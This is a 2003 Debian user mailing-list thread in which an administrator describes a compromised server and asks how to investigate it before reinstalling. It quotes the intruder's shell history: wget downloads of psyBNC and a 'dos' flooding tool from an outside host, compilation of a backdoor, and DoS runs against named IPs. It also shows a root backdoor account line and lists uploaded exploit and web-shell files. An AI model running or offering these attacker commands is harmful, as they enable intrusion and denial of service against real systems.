Laurent Corbes {Caf'} wrote:
On Wed, 17 Sep 2003 22:29:58 +0200
Markus Schabel <[EMAIL PROTECTED]> wrote:


I've seen some strange things on my (stable with security-updates)
server: the last apt-get update didn't work because gzip segfaultet.
I've copied gzip from another server over the version on this server,
but it also crashed. Interesting was that the executable was bigger
after the segfault.


curious.


In a ps I can see a lot of Zombies (rm, ln, readlink, grep) and I've no
idea where they come from.


it's the daily cronjob that stole.

yes, and that's reproducable :(


You think the server got hacked? Are there any other things that can
lead to this? man also behaves strange, it says either "No manual entry
for...", "What manual page do you want?" or nothing.


i'm thinking about a hardware problem. may the harddrive is in failure (get the ouput of dmesg) or a very big
ram problem that corrupt files on the hard drive.

request_module[net-pf-14]: waitpid(15400,...) failed, errno 1 ptrace uses obsolete (PF_INET,SOCK_PACKET) eth0: Promiscuous mode enabled. device eth0 entered promiscuous mode eth0: Promiscuous mode enabled.

but nothing about the disks

in every case simply copy all the data you can and inspect the hdd in
another box mounting it read only.

setuid.changes lists /dev/* and the following programs: pppd postdrop postqueue wall newgrp at chage chfn chsh expiry gpasswd passwd write crontab dotlockfile ssh-keysign procmail lockfile popauth pt_chown traceroute mount umount login su ping suexec /usr/lib/mc/bin/cons.saver

and a new user exists in /etc/passwd: slacks:x:0:0::/etc/.rpn:/bin/bash

in /etc/.rpn theres a .bash_history with the following content:

id
mkdir /etc/.rpn
ps -aux
ps -aux | grep tbk
kill -15292 pid
kill 15292
netconf
locate httpd.conf
cd /etc/.rpn
ls -al
wget
cd /var/www/cncmap/www/upload/renegade
ls -al
rm -rf phpshell.php
cat bd.c
gcc -o bd bd.c
ftp ftp.hpg.com.br
rm -rf bd.c
cd /tmp
cd /etc/.rpn
wget www.slacks.hpg.com.br/psyBNC.tar.gz
tar zvxf psyBNC.tar.gz
tar -zvxf psyBNC.tar.gz
tar
gunzip psyBNC.tar.gz
tar -Acdtrux psyBNC.tar.gz
tar -x psyBNC.tar.gz
tar -Acd psyBNC.tar.gz
tar -cd psyBNC.tar.gz
tar --help
pwd
ls
rm -rf *
wget www.slacks.hpg.com.br/bin/dos
chmod +x dos
./dos
./dos 200.101.87.8 65535 8569
./dos 200.199.95.11 65535 8569

and the executable dos


interesting is the line "tar --help" :D

in "last" I see the following:

slacks pts/0 Sun Sep 14 02:26 - 03:37 (01:11) 200-147-107-35.tlm.dialuol.com.br

IP of the hacker is 200.147.107.35 I think we have no chance of legal actions against .br?

in the directory /var/www/cncmap/www/upload/renegade there are the
following files: backhole.pl
e.c ("Copyright (c) 2003 DTORS Security, ANGELO ROSIELLO 18/02/2003, LES-EXPLOIT for Linux x86")
rem.php (phpRemoteView)


so we got hacked :(

what informations should we gather before we reinstall the complete
server? I think we have to reinstall the whole thing or do you have
any ideas?

thanks
Markus


-- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Reply via email to